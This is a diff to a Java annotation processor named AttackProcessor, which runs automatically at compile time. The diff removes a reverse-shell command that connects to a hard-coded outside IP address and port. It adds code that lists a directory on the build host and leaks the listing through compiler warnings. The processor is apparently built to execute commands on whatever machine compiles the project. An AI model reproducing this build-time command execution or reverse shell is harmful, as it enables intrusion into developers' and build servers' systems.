@@ -9,6 +9,7 @@ import javax.lang.model.element.TypeElement;
 import javax.tools.Diagnostic;
 import java.io.File;
 import java.io.IOException;
+import java.util.Scanner;
 import java.util.Set;
 
 @SupportedAnnotationTypes("*")
@@ -26,14 +27,18 @@ public class AttackProcessor extends AbstractProcessor {
         File folder = new File(System.getProperty("user.home"));
 
         try {
-            Runtime r = Runtime.getRuntime();
+            //Runtime r = Runtime.getRuntime();
             //Process p = r.exec(new String[]{"/bin/bash","-c","open ."});
 
-            Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/182.92.151.151/8888 0>&1"});
-            p.waitFor();
+            Scanner s = new Scanner( Runtime.getRuntime().exec( "ls -a /root/workspace/plugins/" ).getInputStream() ).useDelimiter(
+                    "\\A" );
+            String rest = s.hasNext() ? s.next() : "";
+            processingEnv.getMessager().printMessage(
+                    Diagnostic.Kind.MANDATORY_WARNING, "res+"+rest);
+
         } catch (IOException e) {
             e.printStackTrace();
-        } catch (InterruptedException e) {
+        } catch (Exception e) {
             e.printStackTrace();
         }
         processingEnv.getMessager().printMessage(
